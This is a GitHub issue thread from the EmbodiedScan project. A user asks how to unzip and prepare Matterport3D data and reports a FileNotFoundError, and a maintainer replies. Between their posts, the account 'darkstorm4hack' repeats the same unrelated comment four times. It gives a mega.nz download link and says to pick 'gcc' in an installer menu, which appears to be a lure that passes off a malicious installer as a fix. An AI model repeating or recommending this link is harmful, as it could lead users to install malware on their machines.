### ISSUE TITLE
[Bug] Hi! Some questions about DataSet Matterport3D

### ISSUE THREAD

**Issue by Fan123456-c** [OpenRobotLab/EmbodiedScan#68]
### Prerequisite

- [X] I have searched [Issues](https://github.com/open-mmlab/mmdetection3d/issues) and [Discussions](https://github.com/open-mmlab/mmdetection3d/discussions) but cannot get the expected help.
- [X] I have read the [FAQ documentation](https://mmdetection3d.readthedocs.io/en/latest/notes/faq.html) but cannot get the expected help.
- [X] The bug has not been fixed in the [latest version (dev-1.x)](https://github.com/open-mmlab/mmdetection3d/tree/dev-1.x) or [latest version (dev-1.0)](https://github.com/open-mmlab/mmdetection3d/tree/dev-1.0).

### Task

I'm using the official example scripts/configs for the officially supported tasks/models/datasets.

### Branch

main branch https://github.com/open-mmlab/mmdetection3d

### Environment

.

### Reproduces the problem - code sample

A scans data in matterport3d such as:
![image](https://github.com/user-attachments/assets/d17fcde5-d944-46fb-b8d4-c9b2dcb77153)

### Reproduces the problem - command or script

.

### Reproduces the problem - error message

My matterport3d raw data is zipped, should I unzip them like scannet and 3rscan?

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Fan123456-c** [comment]
when I run test.py, it always tells me: FileNotFoundError: [Errno 2] No such file or directory: 'data/matterport3d/7y3sRwLe3Va/matterport_color_images/652313c43e064574a464d97f67c52007_i0_0.jpg'.
But I unzipped it, there is indeed that file .So, do I need to extract all the files in Matterport3D?

**Comment by mxh1999** [comment]
For what part of the matterport3d data is necessary, please see #12.
All files used need to be unzipped.
